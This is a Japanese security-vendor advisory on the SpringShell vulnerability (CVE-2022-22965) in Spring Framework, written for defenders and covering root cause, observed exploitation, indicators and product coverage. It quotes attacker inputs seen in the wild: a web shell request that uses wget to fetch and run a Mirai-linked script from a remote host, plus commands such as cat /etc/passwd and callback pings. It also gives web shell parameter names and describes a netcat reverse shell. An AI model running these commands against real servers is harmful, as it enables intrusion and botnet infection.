[![Logo](https://www.paloaltonetworks.com/wp-content/uploads/2021/07/PANW_Parent.png)](https://www.paloaltonetworks.jp/)  
[![Unit42 Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/unit42-logo-white.svg)](https://unit42.paloaltonetworks.com/ja/)  
Menu

* [セキュリティ コンサルティング](https://www.paloaltonetworks.com/unit42)
* [**現在、攻撃を受けていますか?**](https://start.paloaltonetworks.com/contact-unit42.html)  
  Japanese
* [English](https://unit42.paloaltonetworks.com/cve-2022-22965-springshell/)
* [Japanese](https://unit42.paloaltonetworks.com/ja/cve-2022-22965-springshell/)
* [Threat Research Center](https://unit42.paloaltonetworks.com/ja/ "Threat Research")
* [主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/ "主なサイバー脅威")
* [脆弱性](https://unit42.paloaltonetworks.com/ja/category/vulnerabilities-ja/ "脆弱性")  
  [脆弱性](https://unit42.paloaltonetworks.com/ja/category/vulnerabilities-ja/)

# \[2022-04-19 JST Windows/Linuxによる保護セクションを更新\] CVE-2022-22965: Spring Coreにリモートコード実行脆弱性(SpringShell)、すでに実際のエクスプロイトも

![Clock Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-clock.svg) 4 分で読めます  
Related Products  
[![Advanced Threat Prevention icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced Threat Prevention](https://unit42.paloaltonetworks.com/ja/product-category/advanced-threat-prevention-ja/ "Advanced Threat Prevention")[![Cortex XDR icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/cortex_RGB_logo_Icon_Color.png)Cortex XDR](https://unit42.paloaltonetworks.com/ja/product-category/cortex-xdr-ja/ "Cortex XDR")[![Cortex XSOAR icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/cortex_RGB_logo_Icon_Color.png)Cortex XSOAR](https://unit42.paloaltonetworks.com/ja/product-category/cortex-xsoar-ja/ "Cortex XSOAR")[![Next-Generation Firewall icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Next-Generation Firewall](https://unit42.paloaltonetworks.com/ja/product-category/next-generation-firewall-ja/ "Next-Generation Firewall")[![Prisma Cloud icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/prisma_RGB_logo_Icon_Color.png)Prisma Cloud](https://unit42.paloaltonetworks.com/ja/product-category/prisma-cloud-ja/ "Prisma Cloud")

* ![Profile Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-profile-grey.svg)  
  著者:
  
  * [Tao Yan](https://unit42.paloaltonetworks.com/ja/author/tao-yan/)
  * [Qi Deng](https://unit42.paloaltonetworks.com/ja/author/qi-deng/)
  * [Ken Hsu](https://unit42.paloaltonetworks.com/ja/author/ken-hsu/)
  * [Haozhe Zhang](https://unit42.paloaltonetworks.com/ja/author/haozhe-zhang/)
  * [Robert Falcone](https://unit42.paloaltonetworks.com/ja/author/robert-falcone/)

* ![Published Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-calendar-grey.svg)  
  公開日:2022年3月31日

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-category.svg)  
  カテゴリー
  
  * [主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/)
  * [脆弱性](https://unit42.paloaltonetworks.com/ja/category/vulnerabilities-ja/)

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-tags-grey.svg)  
  タグ:
  
  * [CVE-2022-22963](https://unit42.paloaltonetworks.com/ja/tag/cve-2022-22963-ja/)
  * [CVE-2022-22965](https://unit42.paloaltonetworks.com/ja/tag/cve-2022-22965-ja/)
  * [Exploit in the wild](https://unit42.paloaltonetworks.com/ja/tag/exploit-in-the-wild-ja/)
  * [Remote Code Execution](https://unit42.paloaltonetworks.com/ja/tag/remote-code-execution-ja/)
  * [SpringShell](https://unit42.paloaltonetworks.com/ja/tag/springshell-ja/)

* [![Download Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-download.svg)](https://unit42.paloaltonetworks.com/ja/cve-2022-22965-springshell/?pdf=download&lg=ja&_wpnonce=5f0cc26d8b "Click here to download")

* [![Print Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-print.svg)](https://unit42.paloaltonetworks.com/ja/cve-2022-22965-springshell/?pdf=print&lg=ja&_wpnonce=5f0cc26d8b "Click here to print")

共有![Down arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/down-arrow.svg)

* ![Link Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-share-link.svg)
* [![Link Email](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-sms.svg)](<mailto:?subject=%5B2022-04-19%20JST%20Windows/Linuxによる保護セクションを更新%5D%20CVE-2022-22965:%20Spring%20Coreにリモートコード実行脆弱性(SpringShell)、すでに実際のエクスプロイトも&body=Check%20out%20this%20article%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fcve-2022-22965-springshell%2F> "Share in email")
* [![Facebook Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-fb-share.svg)](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fcve-2022-22965-springshell%2F "Share in Facebook")
* [![LinkedIn Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-linkedin-share.svg)](<https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fcve-2022-22965-springshell%2F&title=%5B2022-04-19%20JST%20Windows/Linuxによる保護セクションを更新%5D%20CVE-2022-22965:%20Spring%20Coreにリモートコード実行脆弱性(SpringShell)、すでに実際のエクスプロイトも> "Share in LinkedIn")
* [![Twitter Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-twitter-share.svg)](<https://twitter.com/intent/tweet?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fcve-2022-22965-springshell%2F&text=%5B2022-04-19%20JST%20Windows/Linuxによる保護セクションを更新%5D%20CVE-2022-22965:%20Spring%20Coreにリモートコード実行脆弱性(SpringShell)、すでに実際のエクスプロイトも> "Share in Twitter")
* [![Reddit Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-reddit-share.svg)](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fcve-2022-22965-springshell%2F&ts=markdown "Share in Reddit")
* [![Mastodon Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-mastodon-share.svg)](<https://mastodon.social/share?text=%5B2022-04-19%20JST%20Windows/Linuxによる保護セクションを更新%5D%20CVE-2022-22965:%20Spring%20Coreにリモートコード実行脆弱性(SpringShell)、すでに実際のエクスプロイトも%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fcve-2022-22965-springshell%2F> "Share in Mastodon")

## 概要

最近、エンタープライズJavaアプリケーションを構築するためのオープンソースフレームワークであるSpring Frameworkに2つの脆弱性があることが開示されました。2022年3月29日、[CVE-2022-22963](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963)として追跡されているSpring Cloud Expression Resource Access Vulnerabilityは、Spring Cloud Function 3.1.7 および 3.2.3 のリリースで[パッチ](https://spring.io/blog/2022/03/29/cve-report-published-for-spring-cloud-function)が適用されています。その2日後の2022年3月31日、Springは、[CVE-2022-22965](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965)として追跡されている別のより深刻な脆弱性を修正するために、Spring Frameworkのバージョン5.3.18と5.2.20を[リリース](https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement)しました。CVE-2022-22965 は、攻撃者が未認証でリモートでコードを実行できる脆弱性(RCE)で、Unit 42 は、この脆弱性がすでに実際に悪用されている様子を確認しています。この脆弱性を悪用されると、侵害されたサーバーにWebシェルがインストールされ、さらにコマンドを実行される可能性があります。

Spring FrameworkはWebシステムの開発に広く利用されており、脆弱性の深刻度がCVSSスコア9.8と極めて高いことから、CVE-2022-22965は情報セキュリティコミュニティで「SpringShell (Spring4Shell)」の名で呼ばれるようになりました。本脆弱性の影響を把握するため、私たちは入手可能な情報をすべて分析してソースコード内の問題となる部分を特定しました。

4月8日に本稿を更新し、パロアルトネットワークスNGFWの脅威防御シグネチャ「Spring Core Remote Code Execution Vulnerability」のヒット数分析から判明したSpringShellのエクスプロイト試行の統計と、Cortex XDR がトリガーしたアラートを掲載しました。また、IoCに関するセクションも追加しました。

パロアルトネットワークスのお客様は、Cortex XDR Prevent/Pro、次世代ファイアウォールの脅威防御サブスクリプション、Prisma Cloud Computeなどの製品とサービスを通じ、CVE-2022-22965およびCVE-2022-22963から保護されています。

|----------|-----------------------------------------------|
| 脆弱性の名称   | SpringShell, Spring4Shell                     |
| 本稿で扱うCVE | CVE-2022-22965, CVE-2022-22963, CVE-2010-1622 |
| 脆弱性の種類   | Remote code execution                         |

## 目次

[影響を受けるソフトウェアとバージョン](#affected-software-and-versions)  
[Spring Frameworkの背景](#background-on-the-spring-framework)  
[CVE-2022-22965の根本原因分析](#root-cause-analysis-for-cve-2022-22965)  
[クラスローダー悪用の背景](#background-on-exploitation-of-the-class-loader)  
[侵害されたサーバー上でのリモートサーバーへのリバースシェル接続確立](#establishing-a-reverse-shell)  
[SpringShellのエクスプロイト](#springshell-exploit)  
[実際に観測された事例](#observed-in-the-wild)  
[結論](#conclusion)  
[追加リソース](#additional-resources)  
[IoC](#indicators)

## 影響を受けるソフトウェアとバージョン

既存のエクスプロイトの概念実証(PoC)は、以下の条件で動作します。

* JDK 9以上
* ServletコンテナとしてのApache Tomcat
* (Spring Bootの実行可能jarとは異なる)従来のWARとしてのパッケージ化
* spring-webmvc または spring-webflux との依存関係
* Spring Framework バージョン 5.3.0 から 5.3.17, 5.2.0 から 5.2.19, およびそれ以前のバージョン

Spring Beans パッケージ(spring-beans-\*.jar) と Spring パラメータバインディングを使用している Java アプリケーションはこの脆弱性による影響を受ける可能性があります。

## Spring Frameworkの背景

Spring Frameworkはオープンソースのアプリケーションフレームワークで、Javaプラットフォーム用のIoC(Inversion of control、制御の反転)コンテナです。その強力な機能と使いやすさから、さまざまなプログラムやシステムで広く利用されています。Spring BootやSpring Cloudなど一部の著名製品もSpring Frameworkで開発されています。

Spring Core (spring-core)はフレームワークの中核となるもので、IoCやDI (Dependency Injection: 依存性注入)などの強力な機能を提供しています。これにはcore、beans、context、Spring Expression Language (SpEL) モジュールが含まれています。

## CVE-2022-22965の根本原因分析

この脆弱性は、Spring FrameworkのgetCachedIntrospectionResultsメソッドがパラメータをバインドするさい、誤ってクラスオブジェクトを公開してしまうことに起因しています。

Springのデフォルトのデータバインディング機構では、開発者がHTTPリクエストの詳細をアプリケーション固有のオブジェクトにバインドできます。シンプルで古典的なアプリケーションのシナリオ例で、開発者がリクエストパラメータを取得するためにTradeオブジェクトを作成する場合を考えてみます(図1参照)。
![シンプルで古典的なアプリケーションのシナリオ例で、開発者がリクエストパラメータを取得するためにTradeオブジェクトを作成する場合を考えてみます(この図)。](https://unit42.paloaltonetworks.com/wp-content/uploads/2022/03/word-image-52.png) 図1. Tradeオブジェクトの例

この後、開発者はコントローラを作成してtradeオブジェクトを使用します(図2参照)。
![開発者はコントローラを作成してtradeオブジェクトを使用します(この図)。](https://unit42.paloaltonetworks.com/wp-content/uploads/2022/03/word-image-53.png) 図2 tradeオブジェクトを使用するコントローラの例

その後、開発者は通常、tradeコントローラ用のリクエストのビルダーを作成し、Webユーザーがリモートからtradeオブジェクトにアクセスできるようにします(図3参照)。
![その後、開発者は通常、tradeコントローラ用のリクエストのビルダーを作成し、Webユーザーがリモートからtradeオブジェクトにアクセスできるようにします(この図)。](https://unit42.paloaltonetworks.com/wp-content/uploads/2022/03/word-image-54.png) 図3 通常のオブジェクトにアクセスする

Webユーザーがtradeオブジェクトのプロパティにアクセスすると、Spring Framework実装のバインディング処理(bindRequestParameters)はgetCachedIntrospectionResultsメソッドを呼び出し、キャッシュ内のオブジェクトプロパティの取得(get)と設定(set)を行います。ただしgetCachedIntrospectionResultsメソッドの戻り値のオブジェクトには、クラスオブジェクトが含まれています。つまり、WebユーザーはURLを送信するだけでリモートからクラスオブジェクトを取得できます(図4参照)。
![ただしgetCachedIntrospectionResultsメソッドの戻り値のオブジェクトには、クラスオブジェクトが含まれています。つまり、WebユーザーはURLを送信するだけでリモートからクラスオブジェクトを取得できます(この図)。](https://unit42.paloaltonetworks.com/wp-content/uploads/2022/03/word-image-55.png) 図4 クラスオブジェクトにアクセスする

クラスオブジェクトをWebユーザーに公開することは非常に危険で、さまざまな方法でRCEにつながる可能性があります。クラスローダーは、ペイロードを悪用し、機微なクラスを動的にロードし、オブジェクトの改ざんやコードの実行を行うためによく利用されます。

### クラスローダー悪用の背景

リモードコード実行(RCE)の簡単な方法として、公開されたクラスローダーを使ってTomcatのログ設定を変更後、JSPのWebシェルをリモートからアップロードする方法があります。URLを送信するだけでTomcatのログ設定を変更する例を図5に示します。これはSpringShell脆弱性の公開PoCで使用されているエクスプロイト方法です。
![URLを送信するだけでTomcatのログ設定を変更する例をこの図に示します。](https://unit42.paloaltonetworks.com/wp-content/uploads/2022/03/word-image-56.png) 図5 Tomcatのログ設定を変更

2010年初頭、Spring Frameworkにおけるあるリモートコード実行の脆弱性に[CVE-2010-1622が](https://nvd.nist.gov/vuln/detail/CVE-2010-1622)割り当てられました。この脆弱性は、CachedIntrospectionResults()で提供されているPropertyDescriptorが適切にチェックされていなかったために、システムのクラスローダーの検索パス変更にclass.classLoaderが利用され、プログラムがリモートのJavaコード呼び出しを許してしまう、というものでした。この脆弱性では、クラスローダーがエクスプロイト上重要な役割を担っています。

この脆弱性はSpring Frameworkバージョン2.5.6.SEC02で修正されています。クラスローダーを取得してエクスプロイトに使う元のやり方はすでに使えなくなっていますが、JDKバージョン9で導入された新しい機能により、クラスローダーを別の方法で取得可能となったため、ふたたびエクスプロイトが可能になりました。

図6に示すコードスニペットは、CVE-2010-1622に対する修正内容です。ここでの修正は、ブロックリストを使って2つのメソッドClass.getClassLoader()、getProtectionDomain()を除外することで行っています(図6でハイライト表示した部分)。しかしブロックリストを使うとリストにないケースが回避されるリスクがあります。そして[Java 9 Platform Module System](https://www.oracle.com/corporate/features/understanding-java-9-modules.html)(JPMS) は、このブロックリストを回避する方法を提供しています。
![図6に示すコードスニペットは、CVE-2010-1622に対する修正内容です。ここでの修正は、ブロックリストを使って2つのメソッドClass.getClassLoader()、getProtectionDomain()を除外することで行っています(この図の青でハイライト表示した部分)。](https://unit42.paloaltonetworks.com/wp-content/uploads/2022/03/word-image-57.png) 図6 CVE-2010-1622の修正内容

### 侵害されたサーバー上でのリモートサーバーへのリバースシェル接続確立

新たに追加されたモジュールプロパティによりlogging設定が変更できるようになり、logging機能経由でJSP Webシェルをwebホストのフォルダに書き込めるようになります(図7参照)。
![新たに追加されたモジュールプロパティによりlogging設定が変更できるようになり、logging機能経由でJSP Webシェルをwebホストのフォルダに書き込めるようになります(この図)。](https://unit42.paloaltonetworks.com/wp-content/uploads/2022/03/word-image-58.png) 図7 JDKバージョン9以降のgetModule

図8は、ペイロードがTomcatのROOTディレクトリにshell7.jspという名前のパスワード保護されたWebシェルをドロップしている様子を示しています。
![図8は、ペイロードがTomcatのROOTディレクトリにshell7.jspという名前のパスワード保護されたWebシェルをドロップしている様子を示しています。](https://unit42.paloaltonetworks.com/wp-content/uploads/2022/03/word-image-59.png) 図8 webディレクトリにJSPのWebシェルを書き込む

その後攻撃者はJSP Webシェルを通じて任意のコマンドを呼び出せます。図9は、侵害されたサーバ上でnetcatを実行し、リモートサーバへのリバースシェルを確立した例です。
![図9は、侵害されたサーバ上でnetcatを実行し、リモートサーバへのリバースシェルを確立した例です。](https://unit42.paloaltonetworks.com/wp-content/uploads/2022/03/image7.png) 図9 netcatでリバースシェル接続を確立

## SpringShellの**エクスプロイト**

このリモートコード実行の脆弱性に対するエクスプロイトコードはすでに一般に公開されています。Unit 42は2022年3月30日未明にスキャントラフィックを初観測していますが、これはURL内にテスト文字列を含むサーバーへのHTTPリクエストでした。図10に初期のスキャンアクティビティの一例を示します。
![図10に初期のスキャンアクティビティの一例を示します](https://unit42.paloaltonetworks.com/wp-content/uploads/2022/03/word-image-61.png) 図10 PAN-DBクラウドログからのスキャントラフィック

脅威防御シグネチャのテスト中、私たちはさらなるスキャンアクティビティを観測しましたが、これはHTTP POSTリクエストのデータセクションにエクスプロイトコードを含んでいました(図11参照)。
![脅威防御シグネチャがトリガーしたCVE-2022-22965関連のスキャントラフィック](https://unit42.paloaltonetworks.com/wp-content/uploads/2022/03/word-image-62.png) 図11 脅威防御シグネチャがトリガーしたCVE-2022-22965関連のスキャントラフィック

脅威防御シグネチャを導入後、Spring Core Remote Code Execution Vulnerabilityシグネチャに関連するパケットキャプチャを分析したところ、これらのアクティビティの大半は、一般公開されているPoCツールから派生したツールで生成されている可能性が高いことがわかりました。私たちの分析からは、エクスプロイトに成功した場合、サーバー上には以下のファイル名でWebシェルのコンテンツが保存されているであろうことがわかっています。

0xd0m7.jsp  
myshell.jsp  
shell.jsp  
tomcatwar.jsp  
wpz.jsp

これらのファイルに書き込まれたWebシェルのコンテンツもやはり公開済みのPoCに含まれているコードと非常によく似ています。Webシェルには2つのバリエーションがあります。1つめはPoCに含まれ、認証にpwdパラメータ(パスワードは常にj)、実行するコマンドにcmdパラメータを使用します。2つめは、認証用のパラメータを使用せず、実行するコマンドにidを使用します。表1は、サーバーに保存されたWebシェルが認証とコマンドに使用するパラメータと、それらが何回確認されたかを示しています。

|--------------------------|--------|----------|--------|
| **URL パラメータ**            | **認証** | **コマンド** | **件数** |
| \&id=\<command\>         |        | id       | 337    |
| \&pwd=j\&cmd=\<command\> | pwd    | cmd      | 219    |

*表1 Spring Core Remote Code Execution Vulnerability用シグネチャでヒットしたWebシェルで使用されるパラメータ*

私たちは、SpringShellアクティビティに関連するファイル名を使ってWebシェルへのアクティビティのテレメトリを検索しました(ただしshell.jspは名前が一般的すぎるので対象外としていることに注意)。私たちは以下のような特異なコマンドがWebシェルに与えられている様子を確認しています。このうち、おそらく/etc/passwdにかかわる2つのコマンドだけが悪意をもってのエクスプロイトと示唆されます。残りのコマンドは一般的なスキャンアクティビティと考えられます。

ls  
nslookup%20\[redacted\].test6.ggdd\[.\]co\[.\]uk  
nslookup+\[redacted\].test6.ggdd\[.\]co\[.\]uk  
ping%20\[redacted\].test6.ggdd\[.\]co\[.\]uk  
ping+\[redacted\].test6.ggdd\[.\]co\[.\]uk  
whoami  
cat%20/etc/passwd  
cat+/etc/passwd  
id  
ifconfig  
ipconfig  
ping%20\[redacted\].burpcollaborator\[.\]net

## 実際に観測された事例

3月31日未明、「Spring Core Remote Code Execution Vulnerability (Spring Coreのリモートコード実行脆弱性)」用シグネチャが公開されました。4月7日にシグネチャの公開から7日分の活動を収集したところ、このシグネチャが43,092回トリガーされていたことがわかりました。図12は、3月31日から4月3日まで総ヒット数が着実に増加し、4月4日にかなり大きく減少し、その後4月5日と6日にまたアクティビティの上昇に傾いた様子を示しています。この時点では、意図的に脆弱なアプリケーションを使用したテストアクティビティ以外で、サーバーにWebシェルをインストールするような悪用が成功したことはまだ確認されていません。
![Spring Core Remote Code Execution Vulnerabilityシグネチャの1日あたりのヒット数を示すグラフ](https://unit42.paloaltonetworks.com/wp-content/uploads/2022/03/Figure-12.png) 図12. Spring Core Remote Code Execution Vulnerabilityシグネチャの1日あたりのヒット数を示すグラフ

分析中は多数の一意なIPアドレスを観測しましたが、2,056個のアドレスがSpring Core Remote Code Execution Vulnerabilityシグネチャをトリガーしていることがわかりました。表2はシグネチャをトリガーした接続元として観測された上位15個のIPアドレスを示したもので、これらが私たちが観測した全アクティビティの50%強を占めていました。

|--------|---------------------|
| **件数** | **IP**              |
| 4064   | 172.16.0.0/12       |
| 2664   | 10.0.0.0/8          |
| 1680   | 178.79.148\[.\]229  |
| 1504   | 82.165.137\[.\]177  |
| 1351   | 172.104.159\[.\]48  |
| 1336   | 109.74.204\[.\]123  |
| 1188   | 5.253.204\[.\]37    |
| 1092   | 185.245.85\[.\]232  |
| 1090   | 185.196.3\[.\]23    |
| 1080   | 172.104.140\[.\]107 |
| 1080   | 207.246.101\[.\]107 |
| 1004   | 45.33.101\[.\]246   |
| 963    | 45.33.65\[.\]249    |
| 911    | 195.246.120\[.\]148 |
| 865    | 176.125.229\[.\]145 |

*表2 Spring Core Remote Code Execution Vulnerabilityシグネチャをトリガーした接続元IP上位15*

Spring Core Remote Code Execution Vulnerabilityのシグネチャをトリガーした31,953個のパケットキャプチャを解析し、エクスプロイトに成功した場合にサーバーに保存されるWebシェルのファイル名とWebシェルのコンテンツとを特定しました。多くの場合、Webシェルのファイル名には .jspという拡張子が与えられていました。これによりインストールしたWebシェルが有効に機能するようになります。ただし多くのケースではファイル名にはWebシェルには対応しない拡張子、たとえば .jsや.txtといった拡張子が与えられていました。これらはおそらく脆弱なサーバーの発見のためにファイルアップロード成功可否を示す目的で使用されたものと推測されます。本稿執筆時点では、95種類の一意なWebシェルファイル名が観測されています。これらは[IoC](#indicators)セクションに記載します。

アクティビティの大部分はtomcarwar.jspというファイル名でした。この名前は最初の概念実証(PoC)スクリプトで使用されたもので、観測されたファイル名の57%以上を占めます。実際、上位3つのファイル名(tomcarwar.jsp、checkexploit.jsp、javatestfila.jsp)は、既知のWebシェルファイル名を使うアクティビティの84％以上を占めていました。図13の円グラフは、もっとも一般的なファイル名のハイレベルな内訳を示したものです。
![SpringShellに関連して観測されたもっとも一般的なwebシェルファイル名を示す円グラフ](https://unit42.paloaltonetworks.com/wp-content/uploads/2022/04/Figure-13-ja.png) 図13. 観測されたもっとも一般的なwebシェルファイル名を示す円グラフ

解析したパケットの大半で、Webシェルの内容は[オリジナルの概念実証用スクリプト](https://github.com/craig/SpringCore0day/blob/main/exp.py)のWebシェルと大差ないことがわかりました(図14参照)。テレメトリで多数観測されたもう1つのWebシェルは、Webシェルが使用するHTTPパラメータと値が異なるだけで全く同じものでした(図15参照)。
![エクスプロイト試行で見られたWebシェルパターン。CVE-2022-22965用のオリジナルのPoCスクリプトからのもの](https://unit42.paloaltonetworks.com/wp-content/uploads/2022/03/Figure-14.png) 図14 エクスプロイト試行で見られたWebシェルパターン。オリジナルのPoCスクリプトからのもの ![エクスプロイト試行で見られたWebシェルパターン。オリジナルのPoCスクリプトに若干修正を加えてある](https://unit42.paloaltonetworks.com/wp-content/uploads/2022/03/Figure-15.png) 図15 エクスプロイト試行で見られたWebシェルパターン。オリジナルのPoCスクリプトに若干修正を加えてある

また、最初のPoC用Webシェルを改変したコンテンツを使用するエクスプロイトも多数確認されました。図16は、実際に観測したコンテツを示したものですが、これらはWebシェルとはみなせません。SPRING\_CORE\_RCEと表示する以上のことは何もしないためです。Webシェル機能がないことから、これはSpringShellに脆弱なサーバーを発見しようとするスキャナがアップロードしたものである可能性が高いと考えられます。
![脆弱なサーバーの発見目的で使われたエクスプロイト試行で観測されたパターン](https://unit42.paloaltonetworks.com/wp-content/uploads/2022/03/Figure-16.png) 図16. 脆弱なサーバーの発見目的で使われたエクスプロイト試行で観測されたパターン

また最近では図17のようなWebシェルコンテンツが増加しています。これは[K3rwinによるべつの概念実証スクリプト](https://github.com/k3rwin/spring-core-rce/blob/master/spring-core-rce.py)です。この特定のWebシェルは、アクターのほしがる機能を含むbase64エンコードされたクラスをロードします。この特定Webシェルは、[AntSwordのshell.jsp](https://github.com/AntSwordProject/AntSword-JSP-Template/blob/master/web/shell.jsp)をベースにしたもので、antのかわりにk3rwinというパラメータを使用してクラスをロードするよう改変されています。
![エクスプロイト試行で見られたWebシェルパターン。K3rwinによるPoCスクリプトからのもの](https://unit42.paloaltonetworks.com/wp-content/uploads/2022/03/Figure-17.png) 図17. エクスプロイト試行で見られたWebシェルパターン。K3rwinによるPoCスクリプトからのもの

SpringShellに関連するテレメトリで私たちが確認した唯一の悪意のあるアクティビティは、tomcatwar.jspというファイル名を含むURLへのHTTPリクエストで、これにはSpringShellの概念実証スクリプトとの関連がありました。このアクティビティは、複数のパラメータをWebシェルに与えて当該Webシェルにコマンドを実行させ、それによりリモートサーバーからスクリプトをダウンロード・実行させる、というものでした(以下参照)。

\[IPV4 アドレス省略\]:8080/tomcatwar.jsp?pwd=j\&cmd=/bin/sh/-c${IFS}'cd${IFS}/tmp;wget${IFS}hxxp://107.174.133\[.\]167/t.sh${IFS}-O-%a6sh${IFS}SpringCore;'

さらに分析したところ、このリモートサーバーにホストされているt.shというスクリプトは、Mirai ボットネットに関連するものでした。上記のリクエストはIPアドレス194.31.98\[.\]186から送信されていましたが、このIPアドレス上にもMirai関連のペイロードがホストされていました。SpringShellの脆弱性を悪用しようとする194.31.98\[.\]186からのインバウンド試行は、図14に示したオリジナル概念実証スクリプトのWebシェルインストールを試みていました。弊社のシグネチャは脆弱性の最初のエクスプロイト試行をブロックしたため、MiraiによるSpringShellのエクスプロイト試行が成功していたのかどうかは確認できませんでした。[Netlab 360](https://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/)、[Trend Micro](https://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html)の両社はSpringShellの脆弱性に関連したMiraiのアクティビティを観測しています。

脅威防御シグネチャのほかにCortex XDRでトリガーされたアラートも分析しましたが、4月4日から4月8日にかけて116件のイベントが確認されました。これらのアラートの大半は前述の概念実証ツールテストがトリガーしたものです。spring4shellという名のDockerコンテナがからむアラートも複数観測されましたが、これらは /helloworldディレクトリをもち、リッスンポートが tcp/8080 になっていました。これらのDockerコンテナは、[Spring4Shell-POC](https://github.com/reznok/Spring4Shell-POC)といった一般公開済みDockerコンテナを使った内部的なテスト試行の一環と思われます。シグネチャはWebシェルファイルの作成時にトリガーされており、そのさい以下のファイルが書き込まれていることが確認されています。

/usr/local/tomcat/work/Catalina/localhost/ROOT/org/apache/jsp/shell\_jsp.java  
/usr/local/tomcat/webapps/ROOT/shell\_.jsp

## 結論

SpringShellには公式にCVE-2022-22965が割り当てられ、2022年3月31日にパッチがリリースされました。エクスプロイトは容易で、関連技術の詳細もすべてインターネット上に出回っているので、SpringShellが完全に兵器化され、さらに大規模に悪用される可能性があります。JDKのバージョン9以降とSpring Framework (またはその派生製品)をベースにしたプロジェクトや製品を持つ開発者やユーザーは早急にパッチを適用することを強くお勧めします。

CVE-2022-22963はSpring Cloud Functionにおける別の脆弱性(厳密にはSpringShellの一部ではない)ですが、境界での対策を確実に行えるよう脅威防御シグネチャが用意されています。Unit 42のリサーチャーは、最近公表された他のSpringの脆弱性に関する情報についても積極的に監視しており、新しい情報が入り次第、その詳細を提供していきます。

Unit 42は弊社のデバイスやクラウドソリューションを経由する悪意のあるトラフィックを積極的に監視しています。

パロアルトネットワークスの製品セキュリティ保証チームは、自社製品に関連するCVE-2022-22963、CVE-2022-22965の評価を行っており、現在はこの深刻度を「[none](https://security.paloaltonetworks.com/CVE-2022-22963)」としています。

[脅威防御](https://www.paloaltonetworks.jp/products/secure-the-network/subscriptions/threat-prevention)サブスクリプションが有効なNGFW製品は本脆弱性に関連する攻撃トラフィックをブロックできます。

* CVE-2022-22965のカバレッジ: 脅威 ID 92393 および 92394 (アプリケーションおよび脅威コンテンツアップデート 8551)
* CVE-2022-22963のカバレッジ: 脅威 ID 92389 (アプリケーションと脅威コンテンツアップデート 8551)
* SpringShell脆弱性エクスプロイトの一部であるwebシェルにより生成されたC2トラフィック: 脅威 ID 83239 (アプリケーションと脅威コンテンツアップデート 8551)

パロアルトネットワークスのPrisma Cloudは、すべての[Compute](https://www.paloaltonetworks.jp/prisma/cloud/cloud-workload-protection-platform)環境においてCVE-2022-22965、CVE-2022-22963の両方の有無を検出できます。

Linuxデバイス上でパロアルトネットワークスCortex XDR Prevent/Proを、エージェントのバージョン7.4以上、コンテンツバージョン450-87751以上を稼働しているお客様はJava DeserializationモジュールによりCVE-2022-22963から保護されています。また、WindowsおよびLinux上でバージョン7.7以上、コンテンツバージョン480以上を稼働しているお客様は、Java Deserializationモジュールにより、CVE-2022-22963およびCVE-2022-22965から保護されています。それ以外のオペレーティングシステムとエクスプロイトは、Behavioral Threat Protection、Password Theft Prevention、Anti Ransomwareなどのエクスプロイト対策モジュールによりエクスプロイト後のアクティビティから保護されています。Cortex XDR Proのお客様は、エクスプロイト後のアクティビティを可視化し、特定的に「Process execution with a suspicious command line indicative of the Spring4Shell exploit」、「Suspicious HTTP Request to a vulnerable Java class」の両Analytics BIOC(振る舞い指標)をトラッキングすることもできます。さらに、ドロップされたWebシェルのIoC(侵害指標)を探索するXQLクエリからBIOCを作成し、自社環境でのエクスプロイト試行を検出できます。

パロアルトネットワークスのCortex XSOARのお客様は「Spring Core and Cloud Function SpEL RCEs」パックを使うことで自動的に本脆弱性を検出・緩和できます。詳しくは[XSOARマーケットプレイス](https://xsoar.pan.dev/marketplace/details/SpringRCEs)を確認してください。

## 追加リソース

